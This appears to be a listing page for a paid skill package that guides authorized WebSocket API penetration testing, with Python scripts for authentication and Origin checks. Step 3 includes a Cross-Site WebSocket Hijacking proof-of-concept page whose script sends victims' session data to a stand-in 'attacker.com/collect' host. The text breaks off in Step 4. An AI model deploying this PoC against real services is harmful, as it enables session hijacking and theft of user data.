Claude
Skills
Sign in
Back

testing-websocket-api-security

Included with Lifetime
$97 forever

Tests WebSocket API implementations for security vulnerabilities including missing authentication on WebSocket upgrade, Cross-Site WebSocket Hijacking (CSWSH), injection attacks through WebSocket messages, insufficient input validation, denial-of-service via message flooding, and information leakage through WebSocket frames. The tester intercepts WebSocket handshakes and messages using Burp Suite, crafts malicious payloads, and tests for authorization bypass on WebSocket channels. Activates for requests involving WebSocket security testing, WS penetration testing, CSWSH attack, or real-time API security assessment.

Backend & APIsapi-securitywebsocketcswshreal-timeinjectionauthenticationscripts

What this skill does

# Testing WebSocket API Security

## When to Use

- Assessing real-time communication APIs that use WebSocket (ws://) or Secure WebSocket (wss://) protocols
- Testing for Cross-Site WebSocket Hijacking (CSWSH) where an attacker's page connects to a legitimate WebSocket server
- Evaluating authentication and authorization enforcement on WebSocket connections and messages
- Testing input validation on WebSocket message payloads for injection vulnerabilities
- Assessing WebSocket implementations for denial-of-service through message flooding or oversized frames

**Do not use** without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.

## Prerequisites

- Written authorization specifying the WebSocket endpoint and testing scope
- Burp Suite Professional with WebSocket interception capability
- Python 3.10+ with `websockets` and `asyncio` libraries
- Browser developer tools for observing WebSocket handshakes and frames
- wscat CLI tool for manual WebSocket interaction: `npm install -g wscat`
- Knowledge of the WebSocket subprotocol in use (JSON-RPC, STOMP, custom)

## Workflow

### Step 1: WebSocket Endpoint Discovery and Handshake Analysis

```python
import asyncio
import websockets
import json
import ssl
import time

WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"

# Capture and analyze the WebSocket handshake
async def analyze_handshake():
    """Analyze WebSocket upgrade request and response headers."""
    try:
        async with websockets.connect(
            WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN},
            ssl=ssl.create_default_context()
        ) as ws:
            print(f"Connected to: {WS_URL}")
            print(f"Protocol: {ws.subprotocol}")
            print(f"Extensions: {ws.extensions}")

            # Send a test message
            test_msg = json.dumps({"type": "ping"})
            await ws.send(test_msg)
            response = await asyncio.wait_for(ws.recv(), timeout=5)
            print(f"Server response: {response}")

            return True
    except websockets.exceptions.InvalidStatusCode as e:
        print(f"Connection rejected: {e.status_code}")
        return False
    except Exception as e:
        print(f"Connection error: {e}")
        return False

asyncio.run(analyze_handshake())
```

### Step 2: Authentication and Authorization Testing

```python
async def test_ws_authentication():
    """Test if WebSocket requires authentication."""
    results = []

    # Test 1: Connect without any authentication
    try:
        async with websockets.connect(WS_URL) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "No authentication",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
            print(f"[VULN] WebSocket accessible without authentication")
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "No authentication", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "No authentication", "status": f"ERROR: {e}"})

    # Test 2: Connect with invalid token
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Invalid token",
                "status": "VULNERABLE",
                "response": resp[:200]
            })
    except websockets.exceptions.InvalidStatusCode:
        results.append({"test": "Invalid token", "status": "SECURE"})
    except Exception as e:
        results.append({"test": "Invalid token", "status": f"ERROR: {e}"})

    # Test 3: Connect with expired token
    expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
    try:
        async with websockets.connect(WS_URL,
            extra_headers={"Authorization": expired_token}) as ws:
            await ws.send(json.dumps({"type": "get_user_data"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({"test": "Expired token", "status": "VULNERABLE"})
    except (websockets.exceptions.InvalidStatusCode, Exception):
        results.append({"test": "Expired token", "status": "SECURE"})

    # Test 4: Token in query parameter (leakage risk)
    try:
        async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
            await ws.send(json.dumps({"type": "ping"}))
            resp = await asyncio.wait_for(ws.recv(), timeout=5)
            results.append({
                "test": "Token in URL",
                "status": "INFO - Token accepted in query parameter (may leak in logs)"
            })
    except Exception:
        results.append({"test": "Token in URL", "status": "REJECTED"})

    for r in results:
        print(f"  [{r['status'][:10]}] {r['test']}")

    return results

asyncio.run(test_ws_authentication())
```

### Step 3: Cross-Site WebSocket Hijacking (CSWSH) Testing

```python
async def test_cswsh():
    """Test for Cross-Site WebSocket Hijacking vulnerability."""
    # CSWSH occurs when the WebSocket server does not validate the Origin header
    # An attacker's website can connect to the legitimate WebSocket and steal data

    origins_to_test = [
        None,                                    # No Origin header
        "https://evil.com",                      # Attacker domain
        "https://target-api.example.com.evil.com",  # Subdomain confusion
        "null",                                  # Null origin (sandboxed iframe)
        "https://target-api.example.com",        # Legitimate origin
        "http://target-api.example.com",         # HTTP downgrade
    ]

    print("=== CSWSH Testing ===\n")
    for origin in origins_to_test:
        try:
            headers = {"Authorization": AUTH_TOKEN}
            if origin:
                headers["Origin"] = origin

            async with websockets.connect(WS_URL, extra_headers=headers) as ws:
                # Try to receive data that should be restricted
                await ws.send(json.dumps({"type": "get_messages"}))
                resp = await asyncio.wait_for(ws.recv(), timeout=5)

                if origin and origin != "https://target-api.example.com":
                    print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
                else:
                    print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
        except websockets.exceptions.InvalidStatusCode as e:
            print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
        except Exception as e:
            print(f"[ERROR] Origin '{origin}' -> {e}")

asyncio.run(test_cswsh())

# PoC HTML page for CSWSH exploitation
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data

var ws = new WebSocket("wss://target-api.example.com/ws");

ws.onopen = function() {
    console.log("Connected to target WebSocket");
    ws.send(JSON.stringify({type: "get_messages"}));
    ws.send(JSON.stringify({type: "get_user_data"}));
};

ws.onmessage = function(event) {
    console.log("Stolen data:", event.data);
    // Exfiltrate to attacker server
    fetch("https://attacker.com/collect", {
        method: "POST",
        body: event.data
    });
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
```

### Step 4: WebSocket Message Injection Testing

```python
async def test_ws_injection():
    """Test WebSocket messages for injection vulnerabiliti

Related in Backend & APIs